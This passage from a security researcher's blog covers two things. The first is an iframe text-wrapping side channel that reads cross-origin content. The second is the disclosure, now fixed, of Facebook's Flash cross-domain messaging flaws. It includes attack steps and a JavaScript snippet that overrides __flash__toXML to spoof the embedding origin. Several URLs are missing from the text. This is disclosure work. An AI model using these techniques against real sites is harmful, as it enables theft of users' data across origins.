This is interesting, in some browsers, it is possible to apply CSS to the scrollbars of the iframe. This is important because this would leak whether the text wrapped contains a background-image, which would be requested when the scrollbar is shown. In some browsers you need to change the backgroundImage after the creation of the iframe for the image to be requested.

Please note this proof of concept doesn't work in all browsers (notably, this only only works webkit-based browsers), so it might not work for you, but feel free to give it a try.

What will happen when you click that button is:
  • The width of the iframe will be slowly reduced pixel by pixel.
  • When the word "dusk" wraps to the next line, it will display the vertical scrollbar.
  • When the vertical scrollbar is shown, the background image will be requested.
  • We detect when such requests happen by checking document.cookie.

Measuring Word Width

So far we found out a way to find when text wraps to the next line, either by detecting the presence of a scrollbar, or navigating a child iframe and detecting it's position relative to the screen monitor.

To measure a specific word width, we will follow the following steps:
  1. Resize the target iframe to:
    • width: 9999999px
    • height: smallest-without-scrollbar;
  2. Slowly reduce the width until the text wraps. (You can reduce in fraction of pixels).
    • If you are detecting a scrollbar, ensure to increase the height to make the scrollbar disappear.
    • If you are detecting text wrapped from a child iframe, detect changes from the new current position.
  3. Repeat
    • Record the exact width at which text wrapping happened.
We will actually learn things in a bit of an odd order. For this particular example, we will get the length of the following:
  • First wrapping:       hello, my name is bond, james bond.
  • Second wrapping:   the secret is on the island!
  • Third wrapping:      bond, james bond.
  • Fourth wrapping:    name is bond,
  • Fifth wrapping:       bond, james
  • Sixth wrapping:      the secret
  • Seventh wrapping:  my name
  • Eighth wrapping:    secret is
  • Ninth wrapping:      name is
  • Tenth wrapping:      is on
The exact fraction of pixel in which the line wraps (which by practice I've seen some times needs to be as accurate as 1E-10 pixels), tells us the length of the line.

By calculating the difference between different lines, we can also get the length of other sequence of words:
  1. hello, my name is
  2. hello, my james bond.
  3. hello, my name is bond.
  4. hello, is bond, james bond.
  5. hello, my bond, james bond.
  6. ...
And we can also get "bond" by subtracting (1) to (3). We can also get "james" by subtracting (3) to the first wrapping, etc..  We might not always get specific word length, and rather groups of two words, but the attack works to both cases.

The question now is.. how hard is it to go from the width of the word (or sequence of words) to the actual contents of them?

Turns out that usually, all letters have a different width, and as long as such width is unique, it's almost trivial to calculate which letters are in each wrapping (although we don't get the order of such letters).

The solution to this problem is the classic knapsack problem which I won't go into details of. While we won't be able to get the order of the letters, we can get which letters to a reasonable degree of accuracy, which should be sufficient to have a very good guess of the value.

It's unclear what's the best solution to this problem. This information leak isn't a vulnerability per-se in browsers, but rather a well known and understood feature. This blog post will hopefully trigger some discussion around this subject and we can come up with solutions.

One challenge is that if we stopped providing mozInnerScreenY / screenTop, then it would be significantly harder to detect and protect against clickjacking. So whichever solution we come up with needs to take that into consideration.

It's also worth mentioning what happens when our iframe is so small that a word doesn't even fit. Well, the answer is that individual characters wrap to the next line, and we can then extract the width of each individual character (rather than each word). This, unfortunately, doesn't work that well in normal websites, as by default they don't break words (unless overridden by CSS's break-word). If we are able to get this, however, it would be possible for us to obtain the order of the characters in each word (and completely read the contents of the iframe without having to guess).

And that was it! This attack allows you to steal contents from websites that don't use X-Frame-Options (or have a fixed CSS width) in all major browsers with browser standard functionality (no vuln up my sleeve!). I felt inclined to use an acronym for this attack (WOLF) since Thai Duong/Juliano Rizzo's attacks (POET, BEAST, CRIME) sound better than "cross-BLAH-jacking", and I like wolves (although, not as much as cats), specially since it kind of feels like insanity wolf to me.

Friday, December 16, 2011

Doing Cross Page Communication Correctly

I haven't updated this blog in more than one year (woops), but it seems like I still have a couple of followers, so I was thinking on what to write about. I was originally planning to post this on August, but the fix was delayed more than expected.

I decided to choose a random target on the interwebs to find an interesting vuln, and since Facebook recently launched it's "Whitehat Program", which rewards people that report them security vulnerabilities (kinda the same as Google's Vulnerability Reward Program), I chose them.

(Note: As of  December 15, Facebook says they have fixed the vulnerability, and awarded a $2,500 USD bounty).

So, I took a look at their "main JS file":

And well, first thing that came to my mind was RPC. Mostly, because I worked implementing the Apache Shindig's version of the Flash RPC, and have helped reviewing easyXDM's implementation, I just knew this is too hard to get right.

A simple grep for ".swf" in their all.js file lead us to "/swf/XdComm.swf". And since I didn't know what domain that was on I tried:

And that worked.

So let's see.. I sent it to and we get this:

There are several non-security-bugs in that code (some of which I decided to ignore for brevity and keep the WTF quota of this blog low).

In general the security problems found are not specific to FB at all, they are mostly, side effects of bad design decisions from either Flash or the browsers. However, this problems are widely known and can be abused by attackers to compromise information.

Calling security.allowDomain

The first thing I notice is that XdComm calls Security.allowDomain and Security.allowInsecureDomain. This allows to execute code in the context of so it's an Flash-XSS, FAIL #1.

The way you exploit this is by loading the victim SWF inside the attacker's SWF. That's it. The problem here is that Adobe provides only one API for enabling two very different functionalities. In this case, what Facebook wants is just allow an HTML container to call whitelisted 'callbacks' from the SWF, but inadvertently it is also allowing anyone to load the SWF inside another SWF and access all methods and variables, which can result in code execution.

Adobe actually acknowledges this is a problem, and they will make changes to support this two different use cases. The reason I don't provide a PoC is because there are several applications out there that depend on this behavior and can't easily deploy any fixes, and Adobe is working on fixing this at Flash (which is where it should be fixed). When there's a viable alternative or a good solution I'll post a PoC.
What FB should have done is keep this SWF out of
Getting the embedding page location

The second thing I notice is that it's getting the origin of the page hosting the SWF calling:
this.currentDomain ="self.document.domain.toString");
And as any Flash developer should know, isn't something you can actually trust, so now you can "cheat" XdComm.swf into thinking it's being embedded by a page it isn't by simply overriding __flash__toXML.

So, by abusing this vulnerable check, we can actually, listen and send messages on any LocalConnection channel. This doesn't only mean we just defeated the security of the transport, but that also, if any other SWF file uses LocalConnection in (or, we can sniff into that as well. So, FAIL #2.

It is hard, for a movie (or a plugin whatsoever) to know with certainty where it's being hosted. A SWF can be sure it's being hosted same domain, by requiring the hosting page to call a method in the Movie (added by ExternalInterface.addCallback), since by default, Flash only allows movies hosted in the same domain to call callback methods of a movie (this is what we do in Shindig for example), but besides that it's not so simple.

Some insecure methods exist and are widely used to know the hosting page, such as calling:"window.location.toString")
There are some variations of that code, such as calling window.location.href.toString, which is also simple to bypass by rewriting the String.toString method, and works on all browsers.

It's futile to try to "protect" those scripts, because of the way Flash handles ExternalInterface, it's possible to modify every single call made by the plugin, since when you call, what really happens is that the plugin injects a script to the window with:
ExecScript('try { __flash__toXML(' + yourCode + ') ; } catch (e) { "<undefined;>"; }');

And, __flash__toXML is a global function injected by Flash, which can be modified to return whatever we want.
    var o;
    window.__flash__toXML = function () { return o("potato") };
    window.__defineSetter__("__flash__toXML", function(x) {o = x;});
It's worth noting that Flash also bases some of it's security decisions on the value of window.location (such as, if a movie is allowed to be scripted from a website or not), and while this check is more difficult to tamper (and browsers actively fix it), it's still possible to do it, and it's even easier on other browsers such as Safari (in Mac OS) where you can just replace the function "__flash_getWindowLocation" and "__flash_getTopLocation".

Luckily, it seems like we might be able to get at least the right Origin in future versions of Flash, as Mozilla is proposing a new NPAPI call just for this. Let's just hope that Adobe makes this available to the SWF application via some API.

What FB should have done is namespace the channel names, and use some other way of verifying the page embedding the SWF (like easyXDM or Shindig does).

It is also possible for an attacker to specify what transport it wishes to use, so we might be able to force a page to use the Flash transport even when it might also support postMessage.

postMessage should be used cautiously

There's one last thing I found. Facebook has a file which seems to allow an attacker to forge (postMessage) messages as coming from into another page that allows framing arbitrary pages.

The Proof of Concept is located at

As you can see the page will allow an attacker to send messages and will also allow the attacker to specify the target origin. The attack seems to be hard to do since the "parent" seems to be hard coded. So this is FAIL #3.

This is a good demonstration why the existing implementation of postMessage is fundamentally broken, it's really easy for two different scripts to interfere with each other. I can't actually blame FB for that, it's more like a design problem in postMessage.

Luckily there's a new mechanism to use postMessage (called channel messaging), which partly solves this problem (or at least makes it harder to happen). You can read more about it here:

Random fact.. This is what Chrome uses internally to communicate with other components like the Web Inspector.

Vendor Response

I reported these issues from on Tuesday Aug 16 2011 at 2 PM (PST), with the draft of this blogpost, and got a human acknowledgement at 7PM. The issue was finally fixed on December 15 2011.


So well, this was my first post of 2011 (it's December!), and I actually made it because there was a few "de facto" knowledge about Flash that I wanted to put in writing somewhere, and because I had a look at Facebook regarding something not strictly related to work!

In general I am impressed on the security of Facebook applications. While doing this I got locked out of my account like 5 or 6 times (maybe they detected strange behavior?), I noticed several security protections in their API (, and they actually do protect against other security vulnerabilities that most websites don't know about (such as escaping bugs, content type sniffing, etc).

I was awarded a $2,500.00 USD bounty for this report (not sure how it was calculated), and I'm considering donating it to charity (it can become 5k!). Any suggestions?